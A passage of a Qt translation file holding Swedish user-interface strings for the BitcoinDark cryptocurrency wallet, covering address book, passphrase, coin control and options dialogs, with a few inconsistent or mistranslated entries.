This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/) and cryptographic software written by Eric Young ([email protected]) and UPnP software written by Thomas Bernard.</source>
<translation>
Detta är experimentell mjukvara.
Distribuerad under mjukvarulicensen MIT/X11, se den medföljande filen COPYING eller http://www.opensource.org/licenses/mit-license.php.
Denna produkten innehåller mjukvara utvecklad av OpenSSL Project för användning i OpenSSL Toolkit (http://www.openssl.org/) och kryptografisk mjukvara utvecklad av Eric Young ([email protected]) samt UPnP-mjukvara skriven av Thomas Bernard.</translation>
</message>
</context>
<context>
<name>AddressBookPage</name>
<message>
<location filename="../forms/addressbookpage.ui" line="+14"/>
<source>Address Book</source>
<translation>Adressbok</translation>
</message>
<message>
<location line="+22"/>
<source>Double-click to edit address or label</source>
<translation>Dubbel-klicka för att ändra adressen eller etiketten</translation>
</message>
<message>
<location line="+27"/>
<source>Create a new address</source>
<translation>Skapa ny adress</translation>
</message>
<message>
<location line="+14"/>
<source>Copy the currently selected address to the system clipboard</source>
<translation>Kopiera den markerade adressen till systemets Urklipp</translation>
</message>
<message>
<location line="-11"/>
<source>&New Address</source>
<translation>Ny adress</translation>
</message>
<message>
<location line="-46"/>
<source>These are your BitcoinDark addresses for receiving payments. You may want to give a different one to each sender so you can keep track of who is paying you.</source>
<translation>Dessa är dina BitcoinDark adesser för att mottaga betalningsförsändelser. Du kan även använda olika adresser för varje avsändare för att enkelt hålla koll på vem som har skickat en betalning.</translation>
</message>
<message>
<location line="+60"/>
<source>&Copy Address</source>
<translation>&Kopiera adress</translation>
</message>
<message>
<location line="+11"/>
<source>Show &QR Code</source>
<translation>Visa &QR kod</translation>
</message>
<message>
<location line="+11"/>
<source>Sign a message to prove you own a BitcoinDark address</source>
<translation>Signera ett meddelande för att bevisa att du äger BitcoinDark adressen</translation>
</message>
<message>
<location line="+3"/>
<source>Sign &Message</source>
<translation>Signera &Meddelande</translation>
</message>
<message>
<location line="+25"/>
<source>Delete the currently selected address from the list</source>
<translation>Ta bort den valda adressen från listan</translation>
</message>
<message>
<location line="-14"/>
<source>Verify a message to ensure it was signed with a specified BitcoinDark address</source>
<translation>Verifiera ett meddelande för att försäkra dig över att det var signerat av en specifik BitcoinDark adress</translation>
</message>
<message>
<location line="+3"/>
<source>&Verify Message</source>
<translation>&Verifiera meddelande</translation>
</message>
<message>
<location line="+14"/>
<source>&Delete</source>
<translation>&Radera</translation>
</message>
<message>
<location filename="../addressbookpage.cpp" line="+65"/>
<source>Copy &Label</source>
<translation>Kopiera &etikett</translation>
</message>
<message>
<location line="+2"/>
<source>&Edit</source>
<translation>&Editera</translation>
</message>
<message>
<location line="+250"/>
<source>Export Address Book Data</source>
<translation>Exportera adressboken</translation>
</message>
<message>
<location line="+1"/>
<source>Comma separated file (*.csv)</source>
<translation>Kommaseparerad fil (*.csv)</translation>
</message>
<message>
<location line="+13"/>
<source>Error exporting</source>
<translation>Exportera felmeddelanden</translation>
</message>
<message>
<location line="+0"/>
<source>Could not write to file %1.</source>
<translation>Kunde inte skriva till fil %1</translation>
</message>
</context>
<context>
<name>AddressTableModel</name>
<message>
<location filename="../addresstablemodel.cpp" line="+144"/>
<source>Label</source>
<translation>Etikett</translation>
</message>
<message>
<location line="+0"/>
<source>Address</source>
<translation>Adress</translation>
</message>
<message>
<location line="+36"/>
<source>(no label)</source>
<translation>(Ingen etikett)</translation>
</message>
</context>
<context>
<name>AskPassphraseDialog</name>
<message>
<location filename="../forms/askpassphrasedialog.ui" line="+26"/>
<source>Passphrase Dialog</source>
<translation>Lösenords Dialog</translation>
</message>
<message>
<location line="+21"/>
<source>Enter passphrase</source>
<translation>Ange lösenord</translation>
</message>
<message>
<location line="+14"/>
<source>New passphrase</source>
<translation>Nytt lösenord</translation>
</message>
<message>
<location line="+14"/>
<source>Repeat new passphrase</source>
<translation>Upprepa nytt lösenord</translation>
</message>
<message>
<location line="+33"/>
<source>Serves to disable the trivial sendmoney when OS account compromised. Provides no real security.</source>
<translation>Avaktiverar "sendmoney" om ditt operativsystem har blivit äventyrat. ger ingen verklig säkerhet.</translation>
</message>
<message>
<location line="+3"/>
<source>For staking only</source>
<translation>Endast för "staking"</translation>
</message>
<message>
<location filename="../askpassphrasedialog.cpp" line="+35"/>
<source>Enter the new passphrase to the wallet.<br/>Please use a passphrase of <b>10 or more random characters</b>, or <b>eight or more words</b>.</source>
<translation>Ange plånbokens nya lösenord. <br/> Använd ett lösenord på <b>10 eller fler slumpmässiga tecken,</b> eller <b>åtta eller fler ord.</b></translation>
</message>
<message>
<location line="+1"/>
<source>Encrypt wallet</source>
<translation>Kryptera plånbok</translation>
</message>
<message>
<location line="+7"/>
<source>This operation needs your wallet passphrase to unlock the wallet.</source>
<translation>Denna operation behöver din plånboks lösenord för att låsa upp plånboken.</translation>
</message>
<message>
<location line="+5"/>
<source>Unlock wallet</source>
<translation>Lås upp plånbok</translation>
</message>
<message>
<location line="+3"/>
<source>This operation needs your wallet passphrase to decrypt the wallet.</source>
<translation>Denna operation behöver din plånboks lösenord för att dekryptera plånboken.</translation>
</message>
<message>
<location line="+5"/>
<source>Decrypt wallet</source>
<translation>Dekryptera plånbok</translation>
</message>
<message>
<location line="+3"/>
<source>Change passphrase</source>
<translation>Ändra lösenord</translation>
</message>
<message>
<location line="+1"/>
<source>Enter the old and new passphrase to the wallet.</source>
<translation>Ange plånbokens gamla och nya lösenord.</translation>
</message>
<message>
<location line="+46"/>
<source>Confirm wallet encryption</source>
<translation>Bekräfta kryptering av plånbok</translation>
</message>
<message>
<location line="+1"/>
<source>Warning: If you encrypt your wallet and lose your passphrase, you will <b>LOSE ALL OF YOUR COINS</b>!</source>
<translation>Varning: Om du krypterar plånboken och glömmer lösenordet, kommer du att <b>FÖRLORA ALLA COINS</b>!</translation>
</message>
<message>
<location line="+0"/>
<source>Are you sure you wish to encrypt your wallet?</source>
<translation>Är du säker på att du vill kryptera din plånbok?</translation>
</message>
<message>
<location line="+15"/>
<source>IMPORTANT: Any previous backups you have made of your wallet file should be replaced with the newly generated, encrypted wallet file. For security reasons, previous backups of the unencrypted wallet file will become useless as soon as you start using the new, encrypted wallet.</source>
<translation>VIKTIGT: Alla tidigare säkerhetskopior du har gjort av plånbokens fil ska ersättas med den nya genererade, krypterade plånboks filen. Av säkerhetsskäl kommer tidigare säkerhetskopior av den okrypterade plånboks filen blir oanvändbara när du börjar använda en ny, krypterad plånbok.</translation>
</message>
<message>
<location line="+103"/>
<location line="+24"/>
<source>Warning: The Caps Lock key is on!</source>
<translation>Varning: Caps Lock är påslaget!</translation>
</message>
<message>
<location line="-133"/>
<location line="+60"/>
<source>Wallet encrypted</source>
<translation>Plånboken är krypterad</translation>
</message>
<message>
<location line="-58"/>
<source>BitcoinDark will close now to finish the encryption process. Remember that encrypting your wallet cannot fully protect your coins from being stolen by malware infecting your computer.</source>
<translation>BTestcoin plånboken kommer nu att stängas för att slutföra krypteringen: Kom ihåg att även en krypterad plånboks säkerhet kan äventyras genom keyloggers eller dylika malwares.</translation>
</message>
<message>
<location line="+13"/>
<location line="+7"/>
<location line="+44"/>
<location line="+6"/>
<source>Wallet encryption failed</source>
<translation>Kryptering av plånbok misslyckades</translation>
</message>
<message>
<location line="-56"/>
<source>Wallet encryption failed due to an internal error. Your wallet was not encrypted.</source>
<translation>Kryptering av plånbok misslyckades på grund av ett internt fel. Din plånbok blev inte krypterad.</translation>
</message>
<message>
<location line="+7"/>
<location line="+50"/>
<source>The supplied passphrases do not match.</source>
<translation>De angivna lösenorden överensstämmer inte.</translation>
</message>
<message>
<location line="-38"/>
<source>Wallet unlock failed</source>
<translation>Upplåsning av plånbok misslyckades</translation>
</message>
<message>
<location line="+1"/>
<location line="+12"/>
<location line="+19"/>
<source>The passphrase entered for the wallet decryption was incorrect.</source>
<translation>Lösenordet för dekryptering av plånbok var felaktig.</translation>
</message>
<message>
<location line="-20"/>
<source>Wallet decryption failed</source>
<translation>Dekryptering av plånbok misslyckades</translation>
</message>
<message>
<location line="+14"/>
<source>Wallet passphrase was successfully changed.</source>
<translation>Plånbokens lösenord har ändrats.</translation>
</message>
</context>
<context>
<name>BitcoinGUI</name>
<message>
<location filename="../bitcoingui.cpp" line="+280"/>
<source>Sign &message...</source>
<translation>Signera &meddelande...</translation>
</message>
<message>
<location line="+242"/>
<source>Synchronizing with network...</source>
<translation>Synkroniserar med nätverk...</translation>
</message>
<message>
<location line="-308"/>
<source>&Overview</source>
<translation>&Översikt</translation>
</message>
<message>
<location line="+1"/>
<source>Show general overview of wallet</source>
<translation>Visa översiktsvy av plånbok</translation>
</message>
<message>
<location line="+17"/>
<source>&Transactions</source>
<translation>&Transaktioner</translation>
</message>
<message>
<location line="+1"/>
<source>Browse transaction history</source>
<translation>Bläddra i transaktionshistorik</translation>
</message>
<message>
<location line="+5"/>
<source>&Address Book</source>
<translation>&Adress bok</translation>
</message>
<message>
<location line="+1"/>
<source>Edit the list of stored addresses and labels</source>
<translation>Editera listan över sparade adresser och deras namn</translation>
</message>
<message>
<location line="-13"/>
<source>&Receive coins</source>
<translation>&Ta emot coins</translation>
</message>
<message>
<location line="+1"/>
<source>Show the list of addresses for receiving payments</source>
<translation>Visa adresslista för att mottaga betalningar</translation>
</message>
<message>
<location line="-7"/>
<source>&Send coins</source>
<translation>&Skicka coins</translation>
</message>
<message>
<location line="+35"/>
<source>E&xit</source>
<translation>&Avsluta</translation>
</message>
<message>
<location line="+1"/>
<source>Quit application</source>
<translation>Avsluta programmet</translation>
</message>
<message>
<location line="+4"/>
<source>Show information about BitcoinDark</source>
<translation>Visa information om BitcoinDark</translation>
</message>
<message>
<location line="+2"/>
<source>About &Qt</source>
<translation>Om &Qt</translation>
</message>
<message>
<location line="+1"/>
<source>Show information about Qt</source>
<translation>Visa information om Qt</translation>
</message>
<message>
<location line="+2"/>
<source>&Options...</source>
<translation>&Alternativ...</translation>
</message>
<message>
<location line="+4"/>
<source>&Encrypt Wallet...</source>
<translation>&Kryptera plånbok...</translation>
</message>
<message>
<location line="+3"/>
<source>&Backup Wallet...</source>
<translation>&Säkerhetskopiera plånbok...</translation>
</message>
<message>
<location line="+2"/>
<source>&Change Passphrase...</source>
<translation>&Byt Lösenord...</translation>
</message>
<message numerus="yes">
<location line="+250"/>
<source>~%n block(s) remaining</source>
<translation><numerusform>~%n block remaining</numerusform><numerusform>~%n block kvar</numerusform></translation>
</message>
<message>
<location line="+6"/>
<source>Downloaded %1 of %2 blocks of transaction history (%3% done).</source>
<translation>Laddat ner %1 av %2 block av transaktions-historiken (%3% klart)</translation>
</message>
<message>
<location line="-247"/>
<source>&Export...</source>
<translation>&Exportera...</translation>
</message>
<message>
<location line="-62"/>
<source>Send coins to a BitcoinDark address</source>
<translation>Skicka coins till en BitcoinDark adress</translation>
</message>
<message>
<location line="+45"/>
<source>Modify configuration options for BitcoinDark</source>
<translation>Modifiera konfigurations-alternativ för BitcoinDark</translation>
</message>
<message>
<location line="+18"/>
<source>Export the data in the current tab to a file</source>
<translation>Exportera datan i tabben till en fil</translation>
</message>
<message>
<location line="-14"/>
<source>Encrypt or decrypt wallet</source>
<translation>Kryptera eller avkryptera plånbok</translation>
</message>
<message>
<location line="+3"/>
<source>Backup wallet to another location</source>
<translation>Säkerhetskopiera plånboken till en annan plats</translation>
</message>
<message>
<location line="+2"/>
<source>Change the passphrase used for wallet encryption</source>
<translation>Byt lösenord för kryptering av plånbok</translation>
</message>
<message>
<location line="+10"/>
<source>&Debug window</source>
<translation>&Debug fönster</translation>
</message>
<message>
<location line="+1"/>
<source>Open debugging and diagnostic console</source>
<translation>Öppna debug- och diagnostikkonsolen</translation>
</message>
<message>
<location line="-5"/>
<source>&Verify message...</source>
<translation>&Verifiera meddelande...</translation>
</message>
<message>
<location line="-200"/>
<source>BitcoinDark</source>
<translation>BitcoinDark</translation>
</message>
<message>
<location line="+0"/>
<source>Wallet</source>
<translation>Plånbok</translation>
</message>
<message>
<location line="+178"/>
<source>&About BitcoinDark</source>
<translation>&Om BitcoinDark</translation>
</message>
<message>
<location line="+9"/>
<source>&Show / Hide</source>
<translation>&Visa / Göm</translation>
</message>
<message>
<location line="+9"/>
<source>Unlock wallet</source>
<translation>Lås upp plånbok</translation>
</message>
<message>
<location line="+1"/>
<source>&Lock Wallet</source>
<translation>&Lås plånbok</translation>
</message>
<message>
<location line="+1"/>
<source>Lock wallet</source>
<translation>Lås plånbok</translation>
</message>
<message>
<location line="+34"/>
<source>&File</source>
<translation>&Arkiv</translation>
</message>
<message>
<location line="+8"/>
<source>&Settings</source>
<translation>&Inställningar</translation>
</message>
<message>
<location line="+8"/>
<source>&Help</source>
<translation>&Hjälp</translation>
</message>
<message>
<location line="+9"/>
<source>Tabs toolbar</source>
<translation>Verktygsfält för Tabbar</translation>
</message>
<message>
<location line="+8"/>
<source>Actions toolbar</source>
<translation>Verktygsfält för handlingar</translation>
</message>
<message>
<location line="+13"/>
<location line="+9"/>
<source>[testnet]</source>
<translation>[testnet]</translation>
</message>
<message>
<location line="+0"/>
<location line="+60"/>
<source>BitcoinDark client</source>
<translation>BitcoinDark klient</translation>
</message>
<message numerus="yes">
<location line="+70"/>
<source>%n active connection(s) to BitcoinDark network</source>
<translation><numerusform>%n aktiv anslutning till BitcoinDark nätverket</numerusform><numerusform>%n aktiva anslutning till BitcoinDark nätverket</numerusform></translation>
</message>
<message>
<location line="+40"/>
<source>Downloaded %1 blocks of transaction history.</source>
<translation>Laddade ner %1 block av transaktionshistoriken.</translation>
</message>
<message>
<location line="+413"/>
<source>Staking.<br>Your weight is %1<br>Network weight is %2<br>Expected time to earn reward is %3</source>
<translation>Staking.<br>Din vikt är %1<br>Nätverkets vikt är %2<br>Uppskattad tid för att få belöning är %3</translation>
</message>
<message>
<location line="+6"/>
<source>Not staking because wallet is locked</source>
<translation>Ingen staking för att plånboken är låst</translation>
</message>
<message>
<location line="+2"/>
<source>Not staking because wallet is offline</source>
<translation>Ingen staking för att plånboken är offline</translation>
</message>
<message>
<location line="+2"/>
<source>Not staking because wallet is syncing</source>
<translation>Ingen staking för att plånboken synkroniseras</translation>
</message>
<message>
<location line="+2"/>
<source>Not staking because you don't have mature coins</source>
<translation>Ingen staking för att dina coins är ännu inte föråldrade</translation>
</message>
<message numerus="yes">
<location line="-403"/>
<source>%n second(s) ago</source>
<translation><numerusform>%n sekund sen</numerusform><numerusform>%n sekunder sen</numerusform></translation>
</message>
<message>
<location line="-284"/>
<source>&Unlock Wallet...</source>
<translation>Lås &Upp plånboken</translation>
</message>
<message numerus="yes">
<location line="+288"/>
<source>%n minute(s) ago</source>
<translation><numerusform>%n minut sen</numerusform><numerusform>%n minuter sen</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n hour(s) ago</source>
<translation><numerusform>%n timme sen</numerusform><numerusform>%n timmar sen</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n day(s) ago</source>
<translation><numerusform>%n dag sen</numerusform><numerusform>%n dagar sen</numerusform></translation>
</message>
<message>
<location line="+6"/>
<source>Up to date</source>
<translation>Uppdaterad</translation>
</message>
<message>
<location line="+7"/>
<source>Catching up...</source>
<translation>Hämtar senaste...</translation>
</message>
<message>
<location line="+10"/>
<source>Last received block was generated %1.</source>
<translation>Senaste mottagna block genererades %1.</translation>
</message>
<message>
<location line="+59"/>
<source>This transaction is over the size limit. You can still send it for a fee of %1, which goes to the nodes that process your transaction and helps to support the network. Do you want to pay the fee?</source>
<translation>Denna transaktion är över gränsen. Du kan ändå skicka den med en %1 avgift, som går till noderna som processerar din transaktion och hjälper till med att upprätthålla nätverket. Vill du betala denna avgift?</translation>
</message>
<message>
<location line="+5"/>
<source>Confirm transaction fee</source>
<translation>Bekräfta transaktionsavgiften</translation>
</message>
<message>
<location line="+27"/>
<source>Sent transaction</source>
<translation>Transaktion skickad</translation>
</message>
<message>
<location line="+1"/>
<source>Incoming transaction</source>
<translation>Inkommande transaktion</translation>
</message>
<message>
<location line="+1"/>
<source>Date: %1
Amount: %2
Type: %3
Address: %4
</source>
<translation>Datum: %1
Belopp: %2
Typ: %3
Adress: %4
</translation>
</message>
<message>
<location line="+100"/>
<location line="+15"/>
<source>URI handling</source>
<translation>URI hantering</translation>
</message>
<message>
<location line="-15"/>
<location line="+15"/>
<source>URI can not be parsed! This can be caused by an invalid BitcoinDark address or malformed URI parameters.</source>
<translation>URI:n kan inte tolkas! Detta kan bero på en ogiltig BitcoinDark adress eller felaktiga URI parametrar.</translation>
</message>
<message>
<location line="+18"/>
<source>Wallet is <b>encrypted</b> and currently <b>unlocked</b></source>
<translation>Denna plånbok är <b>krypterad</b> och för närvarande <b>olåst</b></translation>
</message>
<message>
<location line="+10"/>
<source>Wallet is <b>encrypted</b> and currently <b>locked</b></source>
<translation>Denna plånbok är <b>krypterad</b> och för närvarande <b>låst</b></translation>
</message>
<message>
<location line="+25"/>
<source>Backup Wallet</source>
<translation>Säkerhetskopiera plånbok</translation>
</message>
<message>
<location line="+0"/>
<source>Wallet Data (*.dat)</source>
<translation>Plånboksdata (*.dat)</translation>
</message>
<message>
<location line="+3"/>
<source>Backup Failed</source>
<translation>Säkerhetskopieringen misslyckades</translation>
</message>
<message>
<location line="+0"/>
<source>There was an error trying to save the wallet data to the new location.</source>
<translation>Ett fel uppstod vid sparandet av plånboken till den nya platsen.</translation>
</message>
<message numerus="yes">
<location line="+76"/>
<source>%n second(s)</source>
<translation><numerusform>%n sekund</numerusform><numerusform>%n sekunder</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n minute(s)</source>
<translation><numerusform>%n minut</numerusform><numerusform>%n minuter</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n hour(s)</source>
<translation><numerusform>%n timme</numerusform><numerusform>%n timmar</numerusform></translation>
</message>
<message numerus="yes">
<location line="+4"/>
<source>%n day(s)</source>
<translation><numerusform>%n dag</numerusform><numerusform>%n dagar</numerusform></translation>
</message>
<message>
<location line="+18"/>
<source>Not staking</source>
<translation>Ingen staking</translation>
</message>
<message>
<location filename="../bitcoin.cpp" line="+109"/>
<source>A fatal error occurred. BitcoinDark can no longer continue safely and will quit.</source>
<translation>Ett fatalt fel uppstod. BTestcoin kan inte fortsätta och stänger programmet.</translation>
</message>
</context>
<context>
<name>ClientModel</name>
<message>
<location filename="../clientmodel.cpp" line="+90"/>
<source>Network Alert</source>
<translation>Nätverkslarm</translation>
</message>
</context>
<context>
<name>CoinControlDialog</name>
<message>
<location filename="../forms/coincontroldialog.ui" line="+14"/>
<source>Coin Control</source>
<translation>Coin kontroll</translation>
</message>
<message>
<location line="+31"/>
<source>Quantity:</source>
<translation>Antal:</translation>
</message>
<message>
<location line="+32"/>
<source>Bytes:</source>
<translation>Bytes:</translation>
</message>
<message>
<location line="+48"/>
<source>Amount:</source>
<translation>Belopp:</translation>
</message>
<message>
<location line="+32"/>
<source>Priority:</source>
<translation>Prioritet:</translation>
</message>
<message>
<location line="+48"/>
<source>Fee:</source>
<translation>Avgift:</translation>
</message>
<message>
<location line="+35"/>
<source>Low Output:</source>
<translation>Låg utskrift:</translation>
</message>
<message>
<location filename="../coincontroldialog.cpp" line="+551"/>
<source>no</source>
<translation>nej</translation>
</message>
<message>
<location filename="../forms/coincontroldialog.ui" line="+51"/>
<source>After Fee:</source>
<translation>Efter avgift:</translation>
</message>
<message>
<location line="+35"/>
<source>Change:</source>
<translation>Ändra:</translation>
</message>
<message>
<location line="+69"/>
<source>(un)select all</source>
<translation>välj/avvälj alla</translation>
</message>
<message>
<location line="+13"/>
<source>Tree mode</source>
<translation>Träd visning</translation>
</message>
<message>
<location line="+16"/>
<source>List mode</source>
<translation>List visning</translation>
</message>
<message>
<location line="+45"/>
<source>Amount</source>
<translation>Mängd</translation>
</message>
<message>
<location line="+5"/>
<source>Label</source>
<translation>etikett</translation>
</message>
<message>
<location line="+5"/>
<source>Address</source>
<translation>Adress</translation>
</message>
<message>
<location line="+5"/>
<source>Date</source>
<translation>Datum</translation>
</message>
<message>
<location line="+5"/>
<source>Confirmations</source>
<translation>Bekräftelser</translation>
</message>
<message>
<location line="+3"/>
<source>Confirmed</source>
<translation>Bekräftad</translation>
</message>
<message>
<location line="+5"/>
<source>Priority</source>
<translation>Prioritet</translation>
</message>
<message>
<location filename="../coincontroldialog.cpp" line="-515"/>
<source>Copy address</source>
<translation>Kopiera adress</translation>
</message>
<message>
<location line="+1"/>
<source>Copy label</source>
<translation>Kopiera etikett</translation>
</message>
<message>
<location line="+1"/>
<location line="+26"/>
<source>Copy amount</source>
<translation>Kopiera belopp</translation>
</message>
<message>
<location line="-25"/>
<source>Copy transaction ID</source>
<translation>Kopiera transaktions ID</translation>
</message>
<message>
<location line="+24"/>
<source>Copy quantity</source>
<translation>Kopiera antal</translation>
</message>
<message>
<location line="+2"/>
<source>Copy fee</source>
<translation>Kopiera avgift</translation>
</message>
<message>
<location line="+1"/>
<source>Copy after fee</source>
<translation>Kopiera efter avgift</translation>
</message>
<message>
<location line="+1"/>
<source>Copy bytes</source>
<translation>Kopiera bytes</translation>
</message>
<message>
<location line="+1"/>
<source>Copy priority</source>
<translation>Kopiera prioritet</translation>
</message>
<message>
<location line="+1"/>
<source>Copy low output</source>
<translation>Kopiera låg utskrift</translation>
</message>
<message>
<location line="+1"/>
<source>Copy change</source>
<translation>Kopiera förändringarna</translation>
</message>
<message>
<location line="+317"/>
<source>highest</source>
<translation>högst</translation>
</message>
<message>
<location line="+1"/>
<source>high</source>
<translation>hög</translation>
</message>
<message>
<location line="+1"/>
<source>medium-high</source>
<translation>medium-hög</translation>
</message>
<message>
<location line="+1"/>
<source>medium</source>
<translation>medium</translation>
</message>
<message>
<location line="+4"/>
<source>low-medium</source>
<translation>låg-medium</translation>
</message>
<message>
<location line="+1"/>
<source>low</source>
<translation>låg</translation>
</message>
<message>
<location line="+1"/>
<source>lowest</source>
<translation>lägsta</translation>
</message>
<message>
<location line="+155"/>
<source>DUST</source>
<translation>STOFT</translation>
</message>
<message>
<location line="+0"/>
<source>yes</source>
<translation>ja</translation>
</message>
<message>
<location line="+10"/>
<source>This label turns red, if the transaction size is bigger than 10000 bytes.
This means a fee of at least %1 per kb is required.
Can vary +/- 1 Byte per input.</source>
<translation>Denna label blir röd, om storleken på transaktionen är över 10000 bytes.
Detta betyder att en avgift på %1 per kb måste betalas.
Kan variera +/- 1 Byte per ingång.</translation>
</message>
<message>
<location line="+1"/>
<source>Transactions with higher priority get more likely into a block.
This label turns red, if the priority is smaller than "medium".
This means a fee of at least %1 per kb is required.</source>
<translation>Transaktioner med en högre prioritet har en större sannolikhet att bli adderat till ett block.
Denna label blir röd, om prioriteten är lägre än "medium".
Detta betyder att en avgift på minst %1 krävs.</translation>
</message>
<message>
<location line="+1"/>
<source>This label turns red, if any recipient receives an amount smaller than %1.
This means a fee of at least %2 is required.
Amounts below 0.546 times the minimum relay fee are shown as DUST.</source>
<translation>Denna label blir röd, om en mottagare får en mängd mindre än %1
Detta betyder att en avgift på minst %2 krävs.
Mängder under 0,546 gånger minimiavgiften visas som DUST.</translation>
</message>
<message>
<location line="+1"/>
<source>This label turns red, if the change is smaller than %1.
This means a fee of at least %2 is required.</source>
<translation>Denna label blir röd, om ändringen är mindre än %1.
Detta betyder att en avgift på minst %2 krävs.</translation>
</message>
<message>
<location line="+37"/>
<location line="+66"/>
<source>(no label)</source>
<translation>(Ingen etikett)</translation>
</message>
<message>
<location line="-9"/>
<source>change from %1 (%2)</source>
<translation>ändra från %1(%2)</translation>
</message>
<message>
<location line="+1"/>
<source>(change)</source>
<translation>(ändra)</translation>
</message>
</context>
<context>
<name>EditAddressDialog</name>
<message>
<location filename="../forms/editaddressdialog.ui" line="+14"/>
<source>Edit Address</source>
<translation>Redigera Adress</translation>
</message>
<message>
<location line="+11"/>
<source>&Label</source>
<translation>&Etikett</translation>
</message>
<message>
<location line="+10"/>
<source>The label associated with this address book entry</source>
<translation>Namnet som kopplats till denna BTestcoin-adress</translation>
</message>
<message>
<location line="+7"/>
<source>&Address</source>
<translation>&Adress</translation>
</message>
<message>
<location line="+10"/>
<source>The address associated with this address book entry. This can only be modified for sending addresses.</source>
<translation>Adressen är kopplad till detta inlägg i adressboken. Denna kan endast ändras för skickande adresser.</translation>
</message>
<message>
<location filename="../editaddressdialog.cpp" line="+20"/>
<source>New receiving address</source>
<translation>Ny mottagaradress</translation>
</message>
<message>
<location line="+4"/>
<source>New sending address</source>
<translation>Ny avsändaradress</translation>
</message>
<message>
<location line="+3"/>
<source>Edit receiving address</source>
<translation>Redigera mottagaradress</translation>
</message>
<message>
<location line="+4"/>
<source>Edit sending address</source>
<translation>Redigera avsändaradress</translation>
</message>
<message>
<location line="+76"/>
<source>The entered address "%1" is already in the address book.</source>
<translation>Den angivna adressen "%1" finns redan i adressboken.</translation>
</message>
<message>
<location line="-5"/>
<source>The entered address "%1" is not a valid BitcoinDark address.</source>
<translation>Den inslagna adressen "%1" är inte en giltig BTestcoin adress.</translation>
</message>
<message>
<location line="+10"/>
<source>Could not unlock wallet.</source>
<translation>Plånboken kunde inte låsas upp.</translation>
</message>
<message>
<location line="+5"/>
<source>New key generation failed.</source>
<translation>Misslyckades med generering av ny nyckel.</translation>
</message>
</context>
<context>
<name>GUIUtil::HelpMessageBox</name>
<message>
<location filename="../guiutil.cpp" line="+420"/>
<location line="+12"/>
<source>BitcoinDark-Qt</source>
<translation>BitcoinDark-Qt</translation>
</message>
<message>
<location line="-12"/>
<source>version</source>
<translation>version</translation>
</message>
<message>
<location line="+2"/>
<source>Usage:</source>
<translation>Användning:</translation>
</message>
<message>
<location line="+1"/>
<source>command-line options</source>
<translation>Command-line alternativ</translation>
</message>
<message>
<location line="+4"/>
<source>UI options</source>
<translation>UI alternativ</translation>
</message>
<message>
<location line="+1"/>
<source>Set language, for example "de_DE" (default: system locale)</source>
<translation>Ställ in språk, t.ex. "de_DE" (förval: systemets språk)</translation>
</message>
<message>
<location line="+1"/>
<source>Start minimized</source>
<translation>Starta som minimerad</translation>
</message>
<message>
<location line="+1"/>
<source>Show splash screen on startup (default: 1)</source>
<translation>Visa startscreen vid start (förval: 1)</translation>
</message>
</context>
<context>
<name>OptionsDialog</name>
<message>
<location filename="../forms/optionsdialog.ui" line="+14"/>
<source>Options</source>
<translation>Alternativ</translation>
</message>
<message>
<location line="+16"/>
<source>&Main</source>
<translation>&Allmänt</translation>
</message>
<message>
<location line="+6"/>
<source>Optional transaction fee per kB that helps make sure your transactions are processed quickly. Most transactions are 1 kB. Fee 0.01 recommended.</source>
<translation>Valfri transaktionsavgift per kB som försäkrar att transaktionen behandlas snabbt. De flesta transaktionerna är 1 kB. En avgift på 0,01 är rekommenderad.</translation>
</message>
<message>
<location line="+15"/>
<source>Pay transaction &fee</source>
<translation>Betala överförings&avgift</translation>
</message>
<message>
<location line="+31"/>
<source>Reserved amount does not participate in staking and is therefore spendable at any time.</source>
<translation>Reserverad mängd deltar inte i stake-processen och kan därför spenderas när som helst.</translation>
</message>
<message>
<location line="+15"/>
<source>Reserve</source>
<translation>Reservera</translation>
</message>
<message>
<location line="+31"/>
<source>Automatically start BitcoinDark after logging in to the system.</source>
<translation>Starta BTestcoin automatiskt vid inloggning.</translation>
</message>
<message>
<location line="+3"/>
<source>&Start BitcoinDark on system login</source>
<translation>&Starta BTestcoin vid inloggning</translation>
</message>
<message>
<location line="+7"/>
<source>Detach block and address databases at shutdown. This means they can be moved to another data directory, but it slows down shutdown. The wallet is always detached.</source>
<translation>Koppla ifrån block och adress-databaserna vid nedstängning. Detta betyder att det kan flyttas till en annan datamapp men saktar ner avstängningen. Plånboken är alltid frånkopplad.</translation>
</message>
<message>
<location line="+3"/>
<source>&Detach databases at shutdown</source>
<translation>Koppla bort &databaserna vid nedkörning</translation>
</message>
<message>
<location line="+21"/>
<source>&Network</source>
<translation>&Nätverk</translation>
</message>
<message>
<location line="+6"/>
<source>Automatically open the BitcoinDark client port on the router. This only works when your router supports UPnP and it is enabled.</source>
<translation>Öppna automatiskt BitcoinDark klientens port på routern. Detta fungerar endast om din router stödjer UPnP och det är aktiverat.</translation>
</message>
<message>
<location line="+3"/>
<source>Map port using &UPnP</source>
<translation>Tilldela port med hjälp av &UPnP</translation>
</message>
<message>
<location line="+7"/>
<source>Connect to the BitcoinDark network through a SOCKS proxy (e.g. when connecting through Tor).</source>
<translation>Anslut till BitcoinDark nätverket via en SOCKS proxy (t.ex. när du ansluter genom Tor).</translation>
</message>
<message>
<location line="+3"/>
<source>&Connect through SOCKS proxy:</source>
<translation>&Anslut genom en SOCKS proxy:</translation>
</message>
<message>
<location line="+9"/>
<source>Proxy &IP:</source>
<translation>Proxy-&IP: </translation>
</message>
<message>
<location line="+19"/>
<source>IP address of the proxy (e.g. 127.0.0.1)</source>
<translation>Proxyns IP-adress (t.ex. 127.0.0.1)</translation>
</message>
<message>
<location line="+7"/>
<source>&Port:</source>
<translation>&Port: </translation>
</message>
<message>
<location line="+19"/>
<source>Port of the proxy (e.g. 9050)</source>
<translation>Proxyns port (t.ex. 9050)</translation>
</message>
<message>
<location line="+7"/>
<source>SOCKS &Version:</source>
<translation>SOCKS &Version:</translation>
</message>
<message>
<location line="+13"/>
<source>SOCKS version of the proxy (e.g. 5)</source>
<translation>SOCKS version av proxyn (t.ex. 5)</translation>
</message>
<message>
<location line="+36"/>
<source>&Window</source>
<translation>&Fönster</translation>
</message>
<message>
<location line="+6"/>
<source>Show only a tray icon after minimizing the window.</source>
<translation>Visa endast en systemfältsikon vid minimering.</translation>
</message>
<message>
<location line="+3"/>
<source>&Minimize to the tray instead of the taskbar</source>
